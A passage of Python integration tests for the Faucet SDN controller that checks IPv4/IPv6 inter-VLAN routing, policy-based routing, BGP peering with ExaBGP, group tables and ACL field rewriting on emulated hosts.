self.add_host_route(first_host, second_host_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
second_host.cmd('ifconfig %s down' % second_host.defaultIntf().name)
log_file = os.path.join(self.tmpdir, 'faucet.log')
expired_re = r'.+expiring dead route %s.+' % second_host_ip.ip
self.wait_until_matching_lines_from_file(expired_re, log_file)
second_host.cmd('ifconfig %s up' % second_host.defaultIntf().name)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.one_ipv4_ping(second_host, first_host_ip.ip)
self.one_ipv4_ping(first_host, second_host_ip.ip)
class FaucetUntaggedIPv6InterVLANRouteTest(FaucetUntaggedTest):
FAUCET_MAC2 = '0e:00:00:00:00:02'
CONFIG_GLOBAL = """
vlans:
100:
faucet_vips: ["fc00::1:254/112", "fe80::1:254/112"]
vlanb:
vid: 200
faucet_vips: ["fc01::1:254/112", "fe80::2:254/112"]
faucet_mac: "%s"
routers:
router-1:
vlans: [100, vlanb]
""" % FAUCET_MAC2
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
proactive_learn_v6: True
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: vlanb
%(port_3)d:
native_vlan: vlanb
%(port_4)d:
native_vlan: vlanb
"""
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('fc00::1:1/64')
second_host_net = ipaddress.ip_interface('fc01::1:1/64')
self.add_host_ipv6_address(first_host, first_host_net)
self.add_host_ipv6_address(second_host, second_host_net)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV6.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
self.one_ipv6_ping(first_host, second_host_net.ip)
self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedIPv4PolicyRouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# 10.99.0.1 is on b2, and 10.99.0.2 is on b3.
# We want to route 10.99.0.0/24 to b2, but we want
# to PBR 10.99.0.2/32 to b3.
first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
remote_ip = ipaddress.ip_interface('10.99.0.1/24')
remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
third_host.setIP(str(third_host_ip.ip), prefixLen=24)
self.host_ipv4_alias(second_host, remote_ip)
self.host_ipv4_alias(third_host, remote_ip2)
self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
# ensure all nexthops resolved.
self.one_ipv4_ping(first_host, first_faucet_vip.ip)
self.one_ipv4_ping(second_host, second_faucet_vip.ip)
self.one_ipv4_ping(third_host, third_faucet_vip.ip)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
self.wait_for_route_as_flow(
third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
# verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
self.one_ipv4_ping(first_host, remote_ip.ip)
self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedIPv4PolicyRouteOrdereredTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "100"
faucet_vips: ["10.0.0.254/24"]
acl_in: pbr
200:
description: "200"
faucet_vips: ["10.20.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.20.0.2"
300:
description: "300"
faucet_vips: ["10.30.0.254/24"]
routes:
- route:
ip_dst: "10.99.0.0/24"
ip_gw: "10.30.0.3"
acls:
pbr:
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.2"
actions:
allow: 1
output:
- swap_vid: 300
- rule:
vlan_vid: 100
dl_type: 0x800
nw_dst: "10.99.0.0/24"
actions:
allow: 1
output:
- swap_vid: 200
- rule:
actions:
allow: 1
routers:
router-100-200:
vlans: [100, 200]
router-100-300:
vlans: [100, 300]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 200
%(port_3)d:
native_vlan: 300
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# 10.99.0.1 is on b2, and 10.99.0.2 is on b3.
# We want to route 10.99.0.0/24 to b2, but we want
# to PBR 10.99.0.2/32 to b3.
first_host_ip = ipaddress.ip_interface('10.0.0.1/24')
first_faucet_vip = ipaddress.ip_interface('10.0.0.254/24')
second_host_ip = ipaddress.ip_interface('10.20.0.2/24')
second_faucet_vip = ipaddress.ip_interface('10.20.0.254/24')
third_host_ip = ipaddress.ip_interface('10.30.0.3/24')
third_faucet_vip = ipaddress.ip_interface('10.30.0.254/24')
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
remote_ip = ipaddress.ip_interface('10.99.0.1/24')
remote_ip2 = ipaddress.ip_interface('10.99.0.2/24')
second_host.setIP(str(second_host_ip.ip), prefixLen=24)
third_host.setIP(str(third_host_ip.ip), prefixLen=24)
self.host_ipv4_alias(second_host, remote_ip)
self.host_ipv4_alias(third_host, remote_ip2)
self.add_host_route(first_host, remote_ip, first_faucet_vip.ip)
self.add_host_route(second_host, first_host_ip, second_faucet_vip.ip)
self.add_host_route(third_host, first_host_ip, third_faucet_vip.ip)
# ensure all nexthops resolved.
self.one_ipv4_ping(first_host, first_faucet_vip.ip)
self.one_ipv4_ping(second_host, second_faucet_vip.ip)
self.one_ipv4_ping(third_host, third_faucet_vip.ip)
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=200)
self.wait_for_route_as_flow(
third_host.MAC(), ipaddress.IPv4Network('10.99.0.0/24'), vlan_vid=300)
# verify b1 can reach 10.99.0.1 and .2 on b2 and b3 respectively.
self.one_ipv4_ping(first_host, remote_ip.ip)
self.one_ipv4_ping(first_host, remote_ip2.ip)
class FaucetUntaggedMixedIPv4RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["172.16.0.254/24", "10.0.0.254/24"]
"""
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('10.0.0.1/24')
second_host_net = ipaddress.ip_interface('172.16.0.1/24')
second_host.setIP(str(second_host_net.ip), prefixLen=24)
self.one_ipv4_ping(first_host, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, self.FAUCET_VIPV4_2.ip)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV4.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV4_2.ip)
self.one_ipv4_ping(first_host, second_host_net.ip)
self.one_ipv4_ping(second_host, first_host_net.ip)
class FaucetUntaggedMixedIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112", "fc01::1:254/112"]
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_net = ipaddress.ip_interface('fc00::1:1/64')
second_host_net = ipaddress.ip_interface('fc01::1:1/64')
self.add_host_ipv6_address(first_host, first_host_net)
self.one_ipv6_ping(first_host, self.FAUCET_VIPV6.ip)
self.add_host_ipv6_address(second_host, second_host_net)
self.one_ipv6_ping(second_host, self.FAUCET_VIPV6_2.ip)
self.add_host_route(
first_host, second_host_net, self.FAUCET_VIPV6.ip)
self.add_host_route(
second_host, first_host_net, self.FAUCET_VIPV6_2.ip)
self.one_ipv6_ping(first_host, second_host_net.ip)
self.one_ipv6_ping(second_host, first_host_net.ip)
class FaucetUntaggedBGPIPv6DefaultRouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route ::/0 next-hop fc00::1:1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
first_host_alias_ip = ipaddress.ip_interface('fc00::50:1/112')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.add_host_ipv6_address(first_host, first_host_alias_ip)
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV6.ip)
self.one_ipv6_ping(second_host, first_host_alias_ip.ip)
self.one_ipv6_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route fc00::10:0/112 next-hop fc00::1:1 local-preference 100;
route fc00::20:0/112 next-hop fc00::1:2 local-preference 100;
route fc00::30:0/112 next-hop fc00::1:2 local-preference 100;
route fc00::40:0/112 next-hop fc00::1:254;
route fc00::50:0/112 next-hop fc00::2:2;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1', self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.verify_invalid_bgp_route(r'.+fc00::40:0\/112.+cannot be us$')
self.verify_ipv6_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv6_routing_mesh()
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
self.verify_traveling_dhcp_mac()
class FaucetUntaggedSameVlanIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::10:1/112", "fc00::20:1/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::10:2"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::20:2"
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_ip = ipaddress.ip_interface('fc00::10:2/112')
first_host_ctrl_ip = ipaddress.ip_address('fc00::10:1')
second_host_ip = ipaddress.ip_interface('fc00::20:2/112')
second_host_ctrl_ip = ipaddress.ip_address('fc00::20:1')
self.add_host_ipv6_address(first_host, first_host_ip)
self.add_host_ipv6_address(second_host, second_host_ip)
self.add_host_route(
first_host, second_host_ip, first_host_ctrl_ip)
self.add_host_route(
second_host, first_host_ip, second_host_ctrl_ip)
self.wait_for_route_as_flow(
first_host.MAC(), first_host_ip.network)
self.wait_for_route_as_flow(
second_host.MAC(), second_host_ip.network)
self.one_ipv6_ping(first_host, second_host_ip.ip)
self.one_ipv6_ping(first_host, second_host_ctrl_ip)
self.one_ipv6_ping(second_host, first_host_ip.ip)
self.one_ipv6_ping(second_host, first_host_ctrl_ip)
class FaucetUntaggedIPv6RouteTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::1:1"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::1:2"
- route:
ip_dst: "fc00::30:0/112"
ip_gw: "fc00::1:2"
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["::1"]
neighbor_addresses: ["::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf('::1')
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
self.verify_ipv6_routing_mesh()
second_host = self.hosts_name_ordered()[1]
self.flap_all_switch_ports()
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv6Network('fc00::30:0/112'))
self.verify_ipv6_routing_mesh()
self.wait_bgp_up('::1', 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '6', 'vlan': '100'}),
0)
updates = self.exabgp_updates(self.exabgp_log)
for route_string in (
'fc00::1:0/112 next-hop fc00::1:254',
'fc00::10:0/112 next-hop fc00::1:1',
'fc00::20:0/112 next-hop fc00::1:2',
'fc00::30:0/112 next-hop fc00::1:2'):
self.assertTrue(re.search(route_string, updates), msg=updates)
class FaucetUntaggedRestBcastIPv6RouteTest(FaucetUntaggedIPv6RouteTest):
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_2)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_3)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_4)d:
native_vlan: 100
restricted_bcast_arpnd: true
"""
class FaucetTaggedIPv6RouteTest(FaucetTaggedTest):
"""Test basic IPv6 routing without BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
faucet_vips: ["fc00::1:254/112"]
routes:
- route:
ip_dst: "fc00::10:0/112"
ip_gw: "fc00::1:1"
- route:
ip_dst: "fc00::20:0/112"
ip_gw: "fc00::1:2"
"""
CONFIG = """
nd_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_TAGGED_BOILER
def test_tagged(self):
"""Test IPv6 routing works."""
host_pair = self.hosts_name_ordered()[:2]
first_host, second_host = host_pair
first_host_ip = ipaddress.ip_interface('fc00::1:1/112')
second_host_ip = ipaddress.ip_interface('fc00::1:2/112')
first_host_routed_ip = ipaddress.ip_interface('fc00::10:1/112')
second_host_routed_ip = ipaddress.ip_interface('fc00::20:1/112')
for _coldstart in range(2):
for _swaps in range(5):
self.verify_ipv6_routing_pair(
first_host, first_host_ip, first_host_routed_ip,
second_host, second_host_ip, second_host_routed_ip)
self.swap_host_macs(first_host, second_host)
self.coldstart_conf()
class FaucetGroupTableTest(FaucetUntaggedTest):
CONFIG = """
group_table: True
""" + CONFIG_BOILER_UNTAGGED
def test_group_exist(self):
self.assertEqual(
100,
self.get_group_id_for_matching_flow(
{'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE))
class FaucetTaggedGroupTableTest(FaucetTaggedTest):
CONFIG = """
group_table: True
""" + CONFIG_TAGGED_BOILER
def test_group_exist(self):
self.assertEqual(
100,
self.get_group_id_for_matching_flow(
{'dl_vlan': '100', 'dl_dst': 'ff:ff:ff:ff:ff:ff'},
table_id=self._FLOOD_TABLE))
class FaucetEthSrcMaskTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_src: 0e:0d:00:00:00:00/ff:ff:00:00:00:00
actions:
allow: 1
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:0d:00:00:00:99')
self.retry_net_ping(hosts=(first_host, second_host))
self.wait_nonzero_packet_count_flow(
{'dl_src': '0e:0d:00:00:00:00/ff:ff:00:00:00:00'},
table_id=self._PORT_ACL_TABLE)
class FaucetDestRewriteTest(FaucetUntaggedTest):
def override_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:02'
OVERRIDE_MAC = override_mac()
def rewrite_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:03'
REWRITE_MAC = rewrite_mac()
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "%s"
actions:
allow: 1
output:
set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (override_mac(), rewrite_mac())
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten mac address.
tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
timeout=5, packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
overridden_host.setMAC(self.OVERRIDE_MAC)
rewrite_host.setMAC(self.REWRITE_MAC)
rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
self.wait_until_matching_flow(
{'dl_dst': self.REWRITE_MAC},
table_id=self._ETH_DST_TABLE,
actions=['OUTPUT:%u' % self.port_map['port_3']])
tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
source_host.MAC(), rewrite_host.MAC()))
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: source_host.cmd(
'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
# this will fail if no reply
lambda: self.one_ipv4_ping(
source_host, rewrite_host.IP(), require_host_learned=False)],
timeout=3, packets=1)
# The ping from h1 to h2's MAC should appear on the third host, not the second host,
# as the ACL should rewrite the dst MAC.
self.assertFalse(re.search(
'%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))
def test_switching(self):
"""Tests that a acl can rewrite the destination mac address,
and the packet will only go out the port of the new mac.
(Continues through faucet pipeline)
"""
source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
self.verify_dest_rewrite(
source_host, overridden_host, rewrite_host, overridden_host)
class FaucetDestRewriteOrderedTest(FaucetUntaggedTest):
def override_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:02'
OVERRIDE_MAC = override_mac()
def rewrite_mac(): # pylint: disable=no-method-argument,no-self-use
return '0e:00:00:00:00:03'
REWRITE_MAC = rewrite_mac()
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "%s"
actions:
allow: 1
output:
- set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (override_mac(), rewrite_mac())
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expect to see the rewritten mac address.
tcpdump_filter = ('icmp and ether dst %s' % self.REWRITE_MAC)
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), self.OVERRIDE_MAC)),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))],
timeout=5, packets=1)
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
def verify_dest_rewrite(self, source_host, overridden_host, rewrite_host, tcpdump_host):
overridden_host.setMAC(self.OVERRIDE_MAC)
rewrite_host.setMAC(self.REWRITE_MAC)
rewrite_host.cmd('arp -s %s %s' % (overridden_host.IP(), overridden_host.MAC()))
rewrite_host.cmd(' '.join((self.FPINGS_ARGS_ONE, overridden_host.IP())))
self.wait_until_matching_flow(
{'dl_dst': self.REWRITE_MAC},
table_id=self._ETH_DST_TABLE,
actions=['OUTPUT:%u' % self.port_map['port_3']])
tcpdump_filter = ('icmp and ether src %s and ether dst %s' % (
source_host.MAC(), rewrite_host.MAC()))
tcpdump_txt = self.tcpdump_helper(
tcpdump_host, tcpdump_filter, [
lambda: source_host.cmd(
'arp -s %s %s' % (rewrite_host.IP(), overridden_host.MAC())),
# this will fail if no reply
lambda: self.one_ipv4_ping(
source_host, rewrite_host.IP(), require_host_learned=False)],
timeout=3, packets=1)
# The ping from h1 to h2's MAC should appear on the third host, not the second host,
# as the ACL should rewrite the dst MAC.
self.assertFalse(re.search(
'%s: ICMP echo request' % rewrite_host.IP(), tcpdump_txt))
def test_switching(self):
"""Tests that a acl can rewrite the destination mac address,
and the packet will only go out the port of the new mac.
(Continues through faucet pipeline)
"""
source_host, overridden_host, rewrite_host = self.hosts_name_ordered()[0:3]
self.verify_dest_rewrite(
source_host, overridden_host, rewrite_host, overridden_host)
class FaucetSetFieldsTest(FaucetUntaggedTest):
# A generic test to verify that a flow will set fields specified for
# matching packets
OUTPUT_MAC = '0f:00:12:23:48:03'
SRC_MAC = '0f:12:00:00:00:ff'
IP_DSCP_VAL = 46
# this is the converted DSCP value that is displayed
NW_TOS_VAL = 184
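# (DSCP occupies the upper six bits of the IPv4 TOS byte, so the displayed
# TOS is IP_DSCP_VAL << 2, i.e. 46 << 2 == 184 == 0xb8.)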
IPV4_SRC_VAL = "192.0.2.0"
IPV4_DST_VAL = "198.51.100.0"
# ICMP echo request
ICMPV4_TYPE_VAL = 8
UDP_SRC_PORT = 68
UDP_DST_PORT = 67
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
actions:
allow: 1
output:
set_fields:
- ipv4_src: '%s'
- ipv4_dst: '%s'
- ip_dscp: %d
- rule:
eth_type: 0x0800
ip_proto: 1
actions:
allow: 1
output:
set_fields:
- icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_set_fields_generic_udp(self):
# Send a basic UDP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send a UDP packet
scapy_pkt = self.scapy_base_udp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has the
# overwritten values
self.assertTrue(
re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
self.IPV4_DST_VAL, self.UDP_DST_PORT),
tcpdump_txt))
# check the packet's converted dscp value
self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))
def test_set_fields_icmp(self):
# Send a basic ICMP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send an ICMP packet
scapy_pkt = self.scapy_icmp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has been
# overwritten to be an ICMP echo request
self.assertTrue(re.search("ICMP echo request", tcpdump_txt))
def test_untagged(self):
pass
class FaucetOrderedSetFieldsTest(FaucetUntaggedTest):
# A generic test to verify that a flow will set fields specified for
# matching packets
OUTPUT_MAC = '0f:00:12:23:48:03'
SRC_MAC = '0f:12:00:00:00:ff'
IP_DSCP_VAL = 46
# this is the converted DSCP value that is displayed
NW_TOS_VAL = 184
IPV4_SRC_VAL = "192.0.2.0"
IPV4_DST_VAL = "198.51.100.0"
# ICMP echo request
ICMPV4_TYPE_VAL = 8
UDP_SRC_PORT = 68
UDP_DST_PORT = 67
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
eth_type: 0x0800
actions:
allow: 1
output:
- set_fields:
- ipv4_src: '%s'
- ipv4_dst: '%s'
- ip_dscp: %d
- rule:
eth_type: 0x0800
ip_proto: 1
actions:
allow: 1
output:
- set_fields:
- icmpv4_type: %d
""" % (IPV4_SRC_VAL, IPV4_DST_VAL, IP_DSCP_VAL, ICMPV4_TYPE_VAL)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_set_fields_generic_udp(self):
# Send a basic UDP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send a UDP packet
scapy_pkt = self.scapy_base_udp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), self.UDP_DST_PORT, self.UDP_SRC_PORT,
dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has the
# overwritten values
self.assertTrue(
re.search("%s.%s > %s.%s" % (self.IPV4_SRC_VAL, self.UDP_SRC_PORT,
self.IPV4_DST_VAL, self.UDP_DST_PORT),
tcpdump_txt))
# check the packet's converted dscp value
self.assertTrue(re.search("tos %s" % hex(self.NW_TOS_VAL), tcpdump_txt))
def test_set_fields_icmp(self):
# Send a basic ICMP packet through the faucet pipeline and verify that
# the expected fields were updated via tcpdump output
